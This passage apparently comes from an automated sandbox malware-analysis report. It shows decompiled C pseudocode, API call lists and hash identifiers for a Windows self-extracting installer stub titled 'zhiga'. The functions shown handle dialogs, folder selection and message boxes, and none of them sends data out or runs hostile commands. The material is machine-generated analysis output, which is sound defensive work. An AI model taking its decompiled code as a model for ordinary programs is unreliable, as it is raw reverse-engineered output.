                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DBD
                                                                        • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82E0A
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                                        • API String ID: 1002816675-3407794480
                                                                        • Opcode ID: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                        • Instruction ID: 22b4253e4d21e9eb6680ff6a7cc74673e86b1f5ffc43ae79a84b2645473fc7d4
                                                                        • Opcode Fuzzy Hash: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                        • Instruction Fuzzy Hash: 07510870B443056BEBA4BB708C4ABFB3699EB45760F444029FA41D51D1DBB8EC42FB26
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00F834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xf891d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xf88584 = _t35;
                                                                        					E00F843D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xf88184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "zhiga");
                                                                        					_t17 = CreateThread(0, 0, E00F84FE0, 0, 0, 0xf88798);
                                                                        					 *0xf8879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00F844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xf8858c);
                                                                        					_t38 =  *0xf88584; // 0x0
                                                                        					_t25 = E00F844B9(_t38, 0x4b2, 0xf81140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xf891d8 = 1;
                                                                        						SetEvent( *0xf8858c);
                                                                        						_t39 =  *0xf8879c; // 0x0
                                                                        						E00F83680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xf8858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xf8879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}












                                                                        0x00f834fb
                                                                        0x00f834fe
                                                                        0x00f83665
                                                                        0x00f83666
                                                                        0x00f83666
                                                                        0x00f83668
                                                                        0x00f8366e
                                                                        0x00f8366e
                                                                        0x00f83671
                                                                        0x00f83671
                                                                        0x00f83677
                                                                        0x00000000
                                                                        0x00f83677
                                                                        0x00f83504
                                                                        0x00f83506
                                                                        0x00f83507
                                                                        0x00f8350c
                                                                        0x00f8365b
                                                                        0x00f8365f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83661
                                                                        0x00f83512
                                                                        0x00f83515
                                                                        0x00f835be
                                                                        0x00f835c1
                                                                        0x00f835d1
                                                                        0x00f835d8
                                                                        0x00f835de
                                                                        0x00f835f8
                                                                        0x00f83617
                                                                        0x00f83617
                                                                        0x00f83623
                                                                        0x00f83637
                                                                        0x00f8363d
                                                                        0x00f83642
                                                                        0x00f83644
                                                                        0x00000000
                                                                        0x00f83646
                                                                        0x00f83652
                                                                        0x00f83657
                                                                        0x00f83658
                                                                        0x00000000
                                                                        0x00f83658
                                                                        0x00f83644
                                                                        0x00f8351b
                                                                        0x00f8351d
                                                                        0x00f8354f
                                                                        0x00f83553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8355f
                                                                        0x00f83565
                                                                        0x00f8357c
                                                                        0x00f83581
                                                                        0x00f83584
                                                                        0x00f8359b
                                                                        0x00f835a1
                                                                        0x00f835a7
                                                                        0x00f835ad
                                                                        0x00f835b3
                                                                        0x00f835b8
                                                                        0x00000000
                                                                        0x00f835b8
                                                                        0x00f83586
                                                                        0x00f83588
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83590
                                                                        0x00000000
                                                                        0x00f83590
                                                                        0x00f83524
                                                                        0x00f83535
                                                                        0x00f83541
                                                                        0x00000000
                                                                        0x00f83549
                                                                        0x00000000

                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00F83535
                                                                        • EndDialog.USER32(?,?), ref: 00F83541
                                                                        • ResetEvent.KERNEL32 ref: 00F8355F
                                                                        • SetEvent.KERNEL32(00F81140,00000000,00000020,00000004), ref: 00F83590
                                                                        • GetDesktopWindow.USER32 ref: 00F835C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F835F1
                                                                        • SendMessageA.USER32(00000000), ref: 00F835F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F83610
                                                                        • SendMessageA.USER32(00000000), ref: 00F83617
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F83623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00F88798), ref: 00F83637
                                                                        • EndDialog.USER32(?,00000000), ref: 00F83671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: zhiga
                                                                        • API String ID: 2406144884-3705506974
                                                                        • Opcode ID: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                        • Instruction ID: 7e12baad91acfb759934f752b89e7ee5f16aa0d595d99d976a4aff6c22161b37
                                                                        • Opcode Fuzzy Hash: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                        • Instruction Fuzzy Hash: 6431E431240209BBEB206F28EC4DFFB3A68E785F60F54451AF602952B0DB799911FF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00F84224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00F844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xf888c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xf887a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xf88598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00F84200;
                                                                        					_v28 = 0xf888c0;
                                                                        					 *0xf8a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xf8a288(_t32, 0xf888c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xf888c0 != 0) {
                                                                        							E00F81680(0xf887a0, 0x104, 0xf888c0);
                                                                        						}
                                                                        						 *0xf8a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xf887a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xf888c0);
                                                                        					_t61 = 0xf888c0;
                                                                        					_t4 =  &(_t61[1]); // 0xf888c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xf888c0; // 0x1f11181
                                                                        					_t44 = CharPrevA(0xf888c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xf888c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}




























                                                                        0x00f84234
                                                                        0x00f8423c
                                                                        0x00f84240
                                                                        0x00f843b2
                                                                        0x00f843b7
                                                                        0x00f843c0
                                                                        0x00000000
                                                                        0x00f843c5
                                                                        0x00f8424c
                                                                        0x00f84252
                                                                        0x00f84257
                                                                        0x00f843a4
                                                                        0x00f843a5
                                                                        0x00f843ab
                                                                        0x00000000
                                                                        0x00f843ab
                                                                        0x00f84263
                                                                        0x00f84269
                                                                        0x00f8426e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8427a
                                                                        0x00f84280
                                                                        0x00f84285
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8428d
                                                                        0x00f84293
                                                                        0x00f842e6
                                                                        0x00f842e9
                                                                        0x00f842ef
                                                                        0x00f842f4
                                                                        0x00f842f7
                                                                        0x00f84300
                                                                        0x00f84307
                                                                        0x00f8430e
                                                                        0x00f84315
                                                                        0x00f8431c
                                                                        0x00f84322
                                                                        0x00f84326
                                                                        0x00f8432d
                                                                        0x00f8432d
                                                                        0x00f8432f
                                                                        0x00f84334
                                                                        0x00f84343
                                                                        0x00f84349
                                                                        0x00f8434d
                                                                        0x00f84354
                                                                        0x00f84354
                                                                        0x00f8435d
                                                                        0x00f8436e
                                                                        0x00f8436e
                                                                        0x00f8437d
                                                                        0x00f84383
                                                                        0x00f84387
                                                                        0x00f8438e
                                                                        0x00f8438e
                                                                        0x00f84387
                                                                        0x00f84391
                                                                        0x00f84399
                                                                        0x00000000
                                                                        0x00f84295
                                                                        0x00f8429f
                                                                        0x00f842a5
                                                                        0x00f842aa
                                                                        0x00f842aa
                                                                        0x00f842ad
                                                                        0x00f842ad
                                                                        0x00f842af
                                                                        0x00f842b0
                                                                        0x00f842b6
                                                                        0x00f842c2
                                                                        0x00f842c8
                                                                        0x00f842ce
                                                                        0x00f842e4
                                                                        0x00f842e4
                                                                        0x00000000
                                                                        0x00f842ce

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F84236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F8424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F84263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F8427A
                                                                        • GetTempPathA.KERNEL32(00000104,00F888C0,?,00000001), ref: 00F8429F
                                                                        • CharPrevA.USER32(00F888C0,01F11181,?,00000001), ref: 00F842C2
                                                                        • CharPrevA.USER32(00F888C0,00000000,?,00000001), ref: 00F842D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F84391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F843A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                        • Instruction ID: ec36900929a26ce360494d6b4fc3a72e5880a3a9b9a6894ef68a5fa7c200beba
                                                                        • Opcode Fuzzy Hash: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                        • Instruction Fuzzy Hash: BB41E374E00209AFE711BF64DC89AFE7BB5EB45394F84016AE941A7251CB749C02FB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xf88a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xf89a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00F81680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00F8681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00F867C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00F8681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00F867C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x00f844b9
                                                                        0x00f844c4
                                                                        0x00f844cb
                                                                        0x00f844d8
                                                                        0x00f844e4
                                                                        0x00f844eb
                                                                        0x00f844ee
                                                                        0x00f844ef
                                                                        0x00f844ef
                                                                        0x00f844f1
                                                                        0x00f844f7
                                                                        0x00f844f8
                                                                        0x00f8467b
                                                                        0x00f844fe
                                                                        0x00f84509
                                                                        0x00f84518
                                                                        0x00f84525
                                                                        0x00f84562
                                                                        0x00f84568
                                                                        0x00f84568
                                                                        0x00f8456b
                                                                        0x00f8456b
                                                                        0x00f8456d
                                                                        0x00f8456e
                                                                        0x00f84572
                                                                        0x00f84578
                                                                        0x00f8457c
                                                                        0x00f845cb
                                                                        0x00f84607
                                                                        0x00f84607
                                                                        0x00f8460d
                                                                        0x00f84613
                                                                        0x00f84617
                                                                        0x00000000
                                                                        0x00f8461d
                                                                        0x00f84623
                                                                        0x00f84626
                                                                        0x00f84628
                                                                        0x00000000
                                                                        0x00f84628
                                                                        0x00f845cd
                                                                        0x00f845cd
                                                                        0x00f845cf
                                                                        0x00f845cf
                                                                        0x00f845d2
                                                                        0x00f845d2
                                                                        0x00f845d4
                                                                        0x00f845d5
                                                                        0x00f845db
                                                                        0x00f845de
                                                                        0x00f845e3
                                                                        0x00f845e9
                                                                        0x00f845ed
                                                                        0x00000000
                                                                        0x00f845f3
                                                                        0x00f845fd
                                                                        0x00000000
                                                                        0x00f84602
                                                                        0x00f845ed
                                                                        0x00f8457e
                                                                        0x00f8457e
                                                                        0x00f84580
                                                                        0x00f84580
                                                                        0x00f84583
                                                                        0x00f84583
                                                                        0x00f84585
                                                                        0x00f84586
                                                                        0x00f8458a
                                                                        0x00f8458c
                                                                        0x00f8458f
                                                                        0x00f8458f
                                                                        0x00f84591
                                                                        0x00f84592
                                                                        0x00f8459b
                                                                        0x00f8459e
                                                                        0x00f845a3
                                                                        0x00f845a9
                                                                        0x00f845ad
                                                                        0x00000000
                                                                        0x00f845af
                                                                        0x00f845af
                                                                        0x00f845bf
                                                                        0x00f8462d
                                                                        0x00f84630
                                                                        0x00f8463d
                                                                        0x00f8464e
                                                                        0x00f8464e
                                                                        0x00f8463f
                                                                        0x00f84640
                                                                        0x00f84647
                                                                        0x00f8464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8464c
                                                                        0x00f84666
                                                                        0x00f8466d
                                                                        0x00f8466f
                                                                        0x00f84675
                                                                        0x00f84675
                                                                        0x00f845ad
                                                                        0x00f84527
                                                                        0x00f8452e
                                                                        0x00f8453f
                                                                        0x00f8453f
                                                                        0x00f84530
                                                                        0x00f84531
                                                                        0x00f84538
                                                                        0x00f8453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8453d
                                                                        0x00f84554
                                                                        0x00f8455a
                                                                        0x00f8455a
                                                                        0x00f8455a
                                                                        0x00f84525
                                                                        0x00f8468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F8460D
                                                                        • MessageBeep.USER32(00000000), ref: 00F84630
                                                                        • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 00F84666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F8466F
                                                                          • Part of subcall function 00F8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                          • Part of subcall function 00F8681F: GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                          • Part of subcall function 00F8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                          • Part of subcall function 00F8681F: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                          • Part of subcall function 00F8681F: RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                                        • API String ID: 3244514340-1120439489
                                                                        • Opcode ID: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                        • Instruction ID: 9940a1fe6dbcc3c7c6772c9ea612413275d77c66b0fe11ba803d35112cee2737
                                                                        • Opcode Fuzzy Hash: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                        • Instruction Fuzzy Hash: ED51F67290021AABDB21BF28CC48BFABB69EF45310F144195FD19A7241DB75ED05EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F82773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
